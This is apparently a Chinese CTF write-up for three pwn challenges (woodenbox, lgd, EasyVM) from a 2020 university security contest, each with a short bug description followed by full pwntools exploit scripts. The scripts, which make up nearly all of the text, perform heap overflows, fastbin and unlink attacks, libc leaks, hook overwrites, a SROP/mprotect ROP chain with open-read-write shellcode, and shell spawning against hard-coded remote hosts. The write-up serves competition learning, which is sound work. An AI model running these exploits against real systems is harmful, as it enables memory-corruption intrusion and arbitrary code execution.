高校战“疫”网络安全分享赛部分wp

March 9, 2020 CTF-Writeup 访问: 28 次

woodenbox

edit的时候重新输入的size没有限制,可造成堆溢出,然后fastbin attack更改malloc_hook为one_gg即可

exp:

from pwn import *
import sys
# Harness configuration for the "woodenbox" script. Written for Python 2
# pwntools: str and bytes are mixed freely below ("a"*n + p64(...)), so it will
# not run unchanged on Python 3.
context.log_level='debug'
debug = 1   # NOTE: this name is rebound to a function (def debug) further down; the int is only consulted here
file_name = './woodenbox2'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'   # local libc; the fixed offsets used later assume the remote build is identical -- TODO confirm against the challenge libc
ip = ''
prot = ''   # empty: the non-debug branch would raise ValueError on int(prot); the real connection is opened later, inside the retry loop
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)   # shadows the Python 2 builtin `file`

# Short aliases for the pwntools tube API used by the helpers below.
sl = lambda x : r.sendline(x)                 # send + newline
sd = lambda x : r.send(x)                     # send raw, no newline
sla = lambda x,y : r.sendlineafter(x,y)       # wait for x, then sendline(y)
rud = lambda x : r.recvuntil(x,drop=True)     # receive up to x, dropping x
ru = lambda x : r.recvuntil(x)                # receive up to and including x
li = lambda name,x : log.info(name+':'+hex(x))   # log a named value in hex
ri = lambda  : r.interactive()                # hand the tube to the user
def add(chunk_size,value):
    """Menu option 1: create an item of `chunk_size` bytes named `value`.

    `value` is sent with sendline, so a trailing newline is appended.
    """
    ru('Your choice:')
    sl('1')
    ru('Please enter the length of item name:')
    sl(str(chunk_size))
    ru('Please enter the name of item:')
    sl(value)
def delete(index):
    """Menu option 3: remove the item at `index`."""
    ru('Your choice:')
    sl('3')
    ru('Please enter the index of item:')
    sl(str(index))
def edit(index,len,value):
    """Menu option 2: re-enter the name of item `index`.

    `len` is the length declared to the target (the write-up notes it is not
    checked against the original allocation). The parameter shadows the
    builtin `len`; callers compute len(pay) before calling, so this is only a
    readability issue. `value` is sent raw with sd(), without a newline.
    """
    ru('Your choice:')
    sl('2')
    ru('Please enter the index of item:')
    sl(str(index))
    ru("Please enter the length of item name:")
    sl(str(len))
    ru("Please enter the new name of the item:")
    sd(value)
def debug():
    """Attach gdb to the current tube `r` and wait for Enter before continuing."""
    gdb.attach(r)
    raw_input()
r.close()   # the local process started by the config block is not used; every attempt below opens its own connection

# Retry loop. Each pass reconnects and replays the whole sequence; if the
# target closes the socket part-way through (EOFError) the attempt is
# discarded and the next one starts. Any other exception (e.g. a timeout) is
# not caught and ends the script. There is no explicit success exit: ri()
# hands the tube to the user, and the loop only comes round again if that
# returns or raises EOFError.
while True:
    try:
        r = remote("121.36.215.224",9998)#process("./woodenbox2")  -- NOTE: target hard-coded here; ip/prot/debug from the config block are ignored
        # Initial layout: five allocations of fixed sizes.
        add(0x68,"aaa")
        add(0x58,"aaa")
        add(0x68,"aaa")
        add(0x68,"aaa")
        add(0x10,"bbbb")
        # Declared length 0x70 exceeds the 0x68 item (the unchecked
        # re-entered length from the write-up).
        edit(0,0x70,"a"*0x68+p64(0xd1))
        delete(2)
        delete(0)
        add(0x58,"ccc")
        # Only two bytes follow the size field here; if this is a partial
        # overwrite of a value that differs between runs, it would explain why
        # some attempts fail and need the retry loop -- TODO confirm.
        pay = "a"*0x58+p64(0x71)+"\xdd\x15"
        edit(0,len(pay),pay)
        add(0x68,"aaa")
        add(0x68,"111")
        pay = "111"+p64(0)*6+p64(0xfbad1800)+p64(0)*3+"\x00"
        edit(4,len(pay),pay)
        # Parse the leaked pointer. 0x3c56a3 is an offset into one specific
        # libc build and must be recomputed for any other libc -- TODO confirm
        # it was derived from the challenge's libc, not only the local one.
        r.recvuntil("\x7f")
        r.recv(2)
        libc_base = u64(r.recv(8))-0x3c56a3
        li("libc_base",libc_base)
        malloc_hook = libc_base + libc.symbols['__malloc_hook']
        add(0x68,"1111")
        add(0x68,"1111")
        add(0x10,"1111")
        delete(6)
        pay = "a"*0x18+p64(0x71)+p64(malloc_hook-0x13)
        edit(1,len(pay),pay)
        add(0x68,"1111")
        one_gg =0xf02a4+libc_base   # one_gadget offset; libc-build-specific like 0x3c56a3 above
        pay = 'a' * 3 + p64(one_gg)
        add(0x68,pay)
        li("one_gg",one_gg)
        # ru('Your choice:')
        # sl('1')
        # ru('Please enter the length of item name:')
        delete(2)
        delete(3)
        # debug()
        ri()
    except EOFError:
        r.close()   # connection dropped: close it and let the loop reconnect
'''
0x7f00e0c215dd
0x7f00e0c20b78
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3ac62 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3ac69 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5fbc5 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5fbc6 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL
'''

lgd

这道题其实是一个纸老虎,每个函数有很复杂的流程,但是经过测试发现,那些流程其实没什么用

测试发现,add的时候,输入的长度就是edit时可以输入的长度,可以造成堆溢出,然后unlink控制heap_list即可,由于程序存在沙箱,最后获取flag的时候要用open、read、write来读出来

exp:

from pwn import *
#author:萝卜
import sys
# Harness configuration for the "lgd" script (Python 2 pwntools style: str and
# bytes are mixed below and the print statement is used further down).
context.arch = 'amd64'   # required by asm() and SigreturnFrame() later in the script
context.log_level='debug'
debug = 0   # 0 selects the remote branch below. NOTE: the name is rebound to a function (def debug) further down
file_name = './pwn'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'   # local libc; libc.symbols lookups and the raw gadget offsets used later assume the remote build is identical -- TODO confirm
ip = '121.36.209.145'
prot = '9998'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)   # shadows the Python 2 builtin `file`; used for file.got['puts'] below

# Short aliases for the pwntools tube API used by the helpers below.
sl = lambda x : r.sendline(x)                 # send + newline
sd = lambda x : r.send(x)                     # send raw, no newline
sla = lambda x,y : r.sendlineafter(x,y)       # wait for x, then sendline(y)
rud = lambda x : r.recvuntil(x,drop=True)     # receive up to x, dropping x
ru = lambda x : r.recvuntil(x)                # receive up to and including x
li = lambda name,x : log.info(name+':'+hex(x))   # log a named value in hex
ri = lambda  : r.interactive()                # hand the tube to the user
def add(chunk_size,value):
    """Menu option 1: request `chunk_size` bytes, then send `value` (with newline) as the content.

    The prompt strings are the target's own; the write-up notes that the length
    given here is what a later edit() may write.
    """
    ru('>> ')
    sl('1')
    ru('______?')
    sl(str(chunk_size))
    ru('start_the_game,yes_or_no?')
    sl(value)
def delete(index):
    """Menu option 2: remove the item at `index`."""
    ru('>> ')
    sl('2')
    ru('index ?')
    sl(str(index))
def show(index):
    """Menu option 3: print the item at `index`; the caller reads the output."""
    ru('>> ')
    sl('3')
    ru('index ?')
    sl(str(index))
def edit(index,value):
    """Menu option 4: replace the content of item `index` with `value`.

    No length is asked for; `value` is sent raw with sd(), without a newline.
    """
    ru('>> ')
    sl('4')
    ru('index ?')
    sl(str(index))
    ru('___c___r__s__++___c___new_content ?')
    sd(value)
def debug():
    """Attach gdb to the current tube `r` and wait for Enter before continuing."""
    gdb.attach(r)
    raw_input()

# Name prompt shown once at start-up.
ru("son call babaaa,what is your name? ")
sl("funcyou")
# Initial allocations. The first two send 0x100 bytes of content for a
# 0x68-byte request (cf. the write-up: the length typed at add time bounds
# what edit() may write later).
add(0x68,"a"*0x100)
add(0x68,"a"*0x100)
add(0x80,"a"*0x80)
add(0x200,"a"*0x200)
edit(1,"a"*0x60+p64(0x60)+"\x90")

# The literal carries a run of leading zeros: 0x0000000006032E8 == 0x6032E8,
# a fixed address in the binary -- presumably the heap list mentioned in the
# write-up; verify against the binary.
target_addr=0x0000000006032E8
fd=target_addr - 0x18
bk=target_addr - 0x10
# NOTE: fake_chunk is assembled but never sent; the three edit() calls below
# write the same fields into item 1 one at a time instead.
fake_chunk='a'*0x8 # prev_size
# fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
# fake_chunk+='a'* #padding
edit(1,"a"*0x18+p64(bk))
edit(1,"a"*0x10+p64(fd))
edit(1,"a"*0x8+p64(0x61))
delete(2)
edit(1,"a"*0x10+p64(file.got['puts']))
show(0)
aaa = rud("1. fater")   # everything printed by show(0) up to the next menu line
# aaa = rud("\x7f")
# print aaa.encode("hex")
# Six raw pointer bytes, zero-extended to eight (Python 2 str arithmetic).
libc_base = u64(aaa[1:7]+"\x00\x00")-libc.symbols['puts']
li("libc_base",libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']   # computed but not used below
free_hook = libc_base + libc.symbols['__free_hook']
setcontext_addr = libc_base + libc.symbols['setcontext']+53   # +53 is a build-specific entry offset -- TODO confirm for the challenge libc
edit(1,"a"*0x10+p64(free_hook))
edit(0,p64(setcontext_addr))
new_area =  free_hook&0xfffffffffffff000   # page-align: start of the page containing free_hook
# Register state handed to setcontext. rip is a raw gadget offset valid for
# one libc build only (same caveat as every other bare 0x... constant below).
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = new_area #
frame.rdx = 0x2000
frame.rsp = new_area
frame.rip = libc_base + 0x00000000000bc375 #: syscall; ret; 

payload = str(frame)
print payload.encode("hex")   # Python 2 only: print statement and str.encode("hex")
li("len",len(payload))
# Gadget offsets: libc-build-specific, not derived from libc.symbols.
pop_rdi = libc_base + 0x0000000000021102
pop_rsi = libc_base + 0x00000000000202e8
pop_rdx = libc_base + 0x0000000000001b92
pop_rax = libc_base + 0x0000000000033544
syscall_ret = libc_base + 0x00000000000bc375
jmp_rsp = libc_base + 0x0000000000002a71
# mprotect(new_area, 0x2000, 7): rax=10 is mprotect on x86-64 and 7 is
# PROT_READ|PROT_WRITE|PROT_EXEC; afterwards jmp rsp continues into the
# bytes that follow the chain.
m_rop = p64(pop_rdi)
m_rop +=p64(new_area)
m_rop +=p64(pop_rsi)
m_rop +=p64(0x2000)
m_rop +=p64(pop_rdx)
m_rop +=p64(7)
m_rop +=p64(pop_rax)
m_rop +=p64(10)
m_rop +=p64(syscall_ret)
m_rop +=p64(jmp_rsp)
# delete(0)
# Shellcode: open("flag") (0x67616c66 is "flag" in little-endian, pushed as
# the path), read up to 0x100 bytes of it onto the stack, then write them to
# stdout -- the open/read/write sequence the write-up describes for the
# sandboxed target. Syscall numbers 2/0/1 are x86-64.
shellcode = asm('''
        push 0x67616c66
        mov rdi, rsp
        xor esi, esi
        mov eax, 2
        syscall     

        mov edi, eax
        mov rsi, rsp
        mov edx, 0x100
        xor eax, eax
        syscall     

        mov edx, eax
        mov rsi, rsp
        mov edi, 1
        mov eax, edi
        syscall
        ''')
edit(3,payload)
delete(3)
r.send(flat(m_rop) + shellcode)   # flat() on an already-packed str is presumably a pass-through here
# debug()
ri()
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

EasyVM

了解过sub_A16功能之后,可以造成任意地址泄露和任意地址修改,修改__free_hook,然后把ptr[10]写上/bin/sh即可
exp:

from pwn import *
import sys
# Harness configuration for the "EasyVM" script (Python 2 pwntools style).
# The target is 32-bit: note the i386 libc path and the p32/u32 helpers used
# throughout.
context.log_level='debug'
debug = 0   # 0 selects the remote branch below. NOTE: the name is rebound to a function (def debug) further down
file_name = './EasyVM'
libc_name = '/lib/i386-linux-gnu/libc.so.6'   # local libc; libc.symbols lookups below assume the remote build is identical -- TODO confirm
ip = '121.36.215.224'
prot = '9999'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)   # shadows the Python 2 builtin `file`; used for file.got[...] below

# Short aliases for the pwntools tube API used by the helpers below.
sl = lambda x : r.sendline(x)                 # send + newline
sd = lambda x : r.send(x)                     # send raw, no newline
sla = lambda x,y : r.sendlineafter(x,y)       # wait for x, then sendline(y)
rud = lambda x : r.recvuntil(x,drop=True)     # receive up to x, dropping x
ru = lambda x : r.recvuntil(x)                # receive up to and including x
li = lambda name,x : log.info(name+':'+hex(x))   # log a named value in hex
ri = lambda  : r.interactive()                # hand the tube to the user
def add(value):
    """Menu option 1: load `value` as the VM program.

    `value` is sent straight after the menu choice, without waiting for a
    second prompt, and with a trailing newline.
    """
    ru('>>> \n')
    sl('1')
    sl(value)
def delete():
    """Menu option 3."""
    ru('>>> \n')
    sl('3')

def run():
    """Menu option 2: execute the loaded program; the caller reads any output."""
    ru('>>> \n')
    sl('2')

def gift():
    """Menu option 4."""
    ru('>>> \n')
    sl("4")

def debug():
    """Attach gdb to the current tube `r` and wait for Enter before continuing."""
    gdb.attach(r)
    raw_input()

var1 = 0x2910   # NOTE: never used below
gift()   # option 4; whatever it prints is skipped by the ru('>>> \n') inside the next add()
# Bytecode for the target's VM. Every program in this script ends with \x99,
# presumably the halt opcode -- TODO confirm from the binary.
pay = "\x09\x80\x02\x10\x29\x00\x00\x41\x11\x99"
add(pay)
run()
# NOTE(review): eval() executes whatever text the remote side sends back. If
# the program prints the address as "0x..." or plain decimal, int(rud("\n"), 0)
# parses the same values without executing them -- confirm the output format.
elf_base = eval(rud("\n"))-file.got['puts']
li("elf_base",elf_base)

setbuf_got = elf_base + file.got['setbuf']

# One record per byte of the setbuf GOT entry:
#   \x71 <4-byte address> \x76 <4 zero bytes> \x53 \x00
pay = "\x71"+p32(setbuf_got)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+1)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+2)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+3)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"+"\x99"

add(pay)
run()
a = rud("\xf7")   # the three low bytes; the dropped 0xf7 high byte is re-appended below
libc_base = u32(a+"\xf7")-libc.symbols['setbuf']
li("libc_base",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
li("malloc_hook",malloc_hook)

# one_gadget offsets for this libc build (cf. the listing at the end of the
# script). one_gg is computed but not used: the script writes system() below.
b = [0x3ac5c,0x3ac5e,0x3ac62,
0x3ac69,
0x5fbc5,
0x5fbc6]
one_gg = p32(b[4] + libc_base)
# one_gg = p32(0x41414141)


realloc_hook = libc_base+libc.symbols['__realloc_hook']   # only referenced by the commented-out variant below
s_realloc = p32(libc.symbols['realloc']+libc_base)       # idem
free_hook = libc_base + libc.symbols['__free_hook']

system = p32(libc.symbols['system']+libc_base)   # Python 2: p32 returns a str, so system[i] below is a 1-char str
# Same record layout as the leak above, with \x54 in place of \x53 --
# presumably the write counterpart; TODO confirm.
pay = "\x71"+p32(free_hook)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+1)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+2)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+3)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"+"\x99"

add(pay)
run()
# print a.encode("hex")
# The four bytes are sent one at a time with a short pause between them.
# str() is a no-op on a 1-char str; on Python 3 system[i] would be an int and
# this would send ASCII digits instead.
sd(str(system[0]))
sleep(0.2)
sd(str(system[1]))
sleep(0.2)
sd(str(system[2]))
sleep(0.2)
sd(str(system[3]))
li("one_gg",0x5fbc6 + libc_base)
# Disabled alternative (kept verbatim as a bare string): same record layout
# aimed at __malloc_hook with realloc's address.
'''
pay = "\x71"+p32(malloc_hook)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+1)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+2)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+3)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"+"\x99"

add(pay)
run()
sd(str(s_realloc[0]))
sleep(0.2)
sd(str(s_realloc[1]))
sleep(0.2)
sd(str(s_realloc[2]))
sleep(0.2)
sd(str(s_realloc[3]))
'''
# 77 (= 5+18*4) filler programs, then two 4-byte writes that together leave
# "/bin/sh\0" in place (the ptr[10] slot from the write-up). The filler count
# is presumably what positions the string at that slot -- TODO confirm.
for x in range(5+18*4):
    pay = "\x71"+"\xaa\xaa\xaa\xaa"+"\x99"
    add(pay)
    run()
pay = "\x71"+"/sh\x00"+"\x99"
add(pay)
run()
pay = "\x71"+"/bin"+"\x99"
add(pay)
run()
# debug()
delete()
# ru('>>> \n')
# sl('1')
ri()

'''
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL


 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL


 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL


 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL


 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL  

'''
